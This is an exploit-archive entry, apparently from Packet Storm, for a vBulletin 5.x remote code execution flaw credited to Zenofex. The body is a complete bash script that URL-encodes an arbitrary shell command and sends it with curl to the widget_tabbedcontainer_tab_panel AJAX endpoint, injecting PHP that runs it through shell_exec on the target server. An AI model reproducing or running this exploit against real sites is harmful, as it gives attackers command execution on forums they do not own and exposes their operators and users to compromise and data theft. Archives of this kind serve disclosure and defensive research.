Lucene search

K
packetstormZenofexPACKETSTORM:158829
HistoryAug 11, 2020 - 12:00 a.m.

vBulletin 5.x Remote Code Execution

2020-08-1100:00:00
Zenofex
packetstormsecurity.com
220
`#!/bin/bash  
#  
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex  
#<br># Usage ./exploit <site> <shell-command><br>  
# Urlencode cmd  
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`  
  
# Send request  
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'  
`